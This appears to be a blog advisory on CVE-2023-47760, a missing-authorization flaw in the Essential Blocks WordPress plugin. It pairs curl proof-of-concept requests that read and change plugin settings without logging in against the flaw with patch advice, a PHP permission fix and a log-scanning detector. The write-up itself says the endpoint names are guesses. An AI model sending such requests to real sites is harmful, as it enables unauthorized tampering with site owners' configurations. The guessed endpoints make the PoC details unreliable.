A critical vulnerability—CVE-2023-47760—was discovered in the popular WordPress plugin Essential Blocks for Gutenberg. This plugin is used by thousands to add custom blocks to the WordPress block editor, but versions through 4.2. suffer from a serious security weakness: Missing Authorization on certain REST API endpoints.
In this guide, we'll break down how this vulnerability works, provide proof-of-concept code, and point you to official references. If you're running this plugin, pay close attention—your WordPress site could be at risk of unauthorized data access or unauthorized actions!
References:
- WPScan Advisory
- NVD Entry
- Official plugin page
## The Vulnerability in Plain English
When a user or a system interacts with your WordPress website through plugins, plugins often provide REST API endpoints. These endpoints let people (or bots) automate actions, like managing content, settings, or even user data.
Essential Blocks for Gutenberg, up to version 4.2., forgot an important step: some of its internal REST API endpoints don't check whether the caller is allowed to use them. This is missing authorization.
Imagine you left your house with the door closed, but not locked. That’s what’s happening here: only people who know about the door can walk right in.
## Impact
An attacker doesn't need to log in to your WordPress site to execute calls to these endpoints. By directly calling the right REST API endpoint, they could:

- Bypass normal WordPress access controls

Depending on the site setup and which endpoints are exposed, this could mean anything from changing how blocks work, up to taking control of the plugin and potentially the site.
## Proof-of-Concept (PoC): Exploiting the Vulnerability
Here’s a simplified example using curl (a command-line HTTP client) to demonstrate the vulnerability. This is based on typical vulnerable endpoints for plugins with this issue. (The actual endpoint name may differ; check the plugin’s code or advisory for the latest.)
Most REST API endpoints in WordPress look like this:

```
/wp-json/<namespace>/<route>
```

Essential Blocks uses endpoints such as:

```
/wp-json/essential-blocks/v1/get-settings
/wp-json/essential-blocks/v1/update-settings
```

Suppose an attacker wants to read the current plugin settings:

```bash
curl -s -X GET "https://victim-site.com/wp-json/essential-blocks/v1/get-settings"
```

If the endpoint is vulnerable, this responds with sensitive settings—even though you aren't logged in.
### Writing Data as an Unauthenticated User

Worse, some endpoints may allow changes. Here's an example if an attacker tries to update plugin options:

```bash
curl -s -X POST "https://victim-site.com/wp-json/essential-blocks/v1/update-settings" \
  -H "Content-Type: application/json" \
  -d '{
    "setting_name": "custom_css",
    "value": "body {background: black !important;}"
  }'
```

If this succeeds, an attacker just altered how blocks appear site-wide!
## How Do You Fix This?

### Upgrade Immediately
Essential Blocks for Gutenberg fixed the issue in later versions.
Go to your WP Admin → Plugins → Essential Blocks → Update to the latest version.
### General Advice for Plugin Authors

Every route registered with `register_rest_route()` must declare a `permission_callback` that checks the caller's capability; when it is omitted, WordPress serves the route to anyone, logged in or not. A correctly protected route registration looks like this (the handler name `eb_get_settings` is a placeholder):

```php
add_action( 'rest_api_init', function () {
    register_rest_route( 'essential-blocks/v1', '/get-settings', [
        'methods'             => 'GET',
        'callback'            => 'eb_get_settings', // placeholder handler name
        'permission_callback' => function () {
            // Reject any caller who lacks the capability; WordPress returns 401/403.
            return current_user_can( 'manage_options' );
        },
    ] );
} );
```
---
## Detection Tips
- **Look for unusual REST API traffic** hitting endpoints like `/wp-json/essential-blocks/v1/...`
- Monitor for unexplained changes in plugin settings or block appearances
- Use a WordPress security plugin (iThemes Security, Wordfence, etc.) that scans for vulnerable plugin versions
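As an added example, not code from the original post or from the plugin: a small Python scan over constructed access-log lines (combined log format) that flags requests to the plugin's REST namespace, rating a successful write that arrives without a wp-admin Referer as high severity. The Referer heuristic, the site host and the sample lines are assumptions; a client can omit or forge the header, so treat hits as leads for review rather than proof.

```python
import re

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Sep/2024:09:12:01 +0000] "GET /wp-json/essential-blocks/v1/get-settings HTTP/1.1" 200 812 "-" "curl/8.4.0"
203.0.113.5 - - [10/Sep/2024:09:12:03 +0000] "POST /wp-json/essential-blocks/v1/update-settings HTTP/1.1" 200 57 "-" "curl/8.4.0"
198.51.100.7 - - [10/Sep/2024:09:15:44 +0000] "POST /wp-json/essential-blocks/v1/update-settings HTTP/1.1" 200 57 "https://example.com/wp-admin/post.php?post=12&action=edit" "Mozilla/5.0"
198.51.100.9 - - [10/Sep/2024:09:16:10 +0000] "GET /wp-json/wp/v2/posts?per_page=5 HTTP/1.1" 200 4012 "https://example.com/" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
PLUGIN_PREFIX = "/wp-json/essential-blocks/v1/"   # namespace named in the write-up above
WRITE_METHODS = {"POST", "PUT", "PATCH", "DELETE"}

def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def classify(entry, site_host):
    """Severity for a plugin-route request: None (ignored/benign), 'medium' or 'high'.
    Assumption: block-editor REST calls carry a Referer from the site's own wp-admin,
    so a plugin route hit without one looks like a bare client such as curl."""
    if not entry["path"].startswith(PLUGIN_PREFIX):
        return None
    if f"//{site_host}/wp-admin/" in entry["referer"]:
        return None
    if entry["method"] in WRITE_METHODS and entry["status"].startswith("2"):
        return "high"      # settings changed by an unauthenticated-looking caller
    return "medium"        # read of plugin settings from outside the editor

def scan(log_text, site_host="example.com"):
    """Return (ip, method, path, severity) for every suspicious plugin-route request."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        severity = classify(entry, site_host)
        if severity:
            findings.append((entry["ip"], entry["method"], entry["path"], severity))
    return findings

if __name__ == "__main__":
    for ip, method, path, severity in scan(SAMPLE_LOG):
        print(f"[{severity}] {ip} {method} {path}")
```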
---
## Original References
- WPScan CVE-2023-47760 Advisory
- National Vulnerability Database - CVE-2023-47760
- WordPress Plugin: Essential Blocks for Gutenberg
---
## Conclusion
CVE-2023-47760 is a high-risk, easy-to-exploit bug in Essential Blocks for Gutenberg—one of WordPress's favorite block plugins.
If you’re using this plugin (version 4.2. or below), you must upgrade immediately.
Stay vigilant:
- Update plugins regularly
- Review plugin and site security best practices
- Check your site logs for suspicious API traffic
Your site’s security is only as strong as its weakest plugin.
---
*If you found this guide helpful, please share with a friend who uses WordPress. Stay safe on the web!*
## Timeline
Published on: 12/09/2024 13:15:29 UTC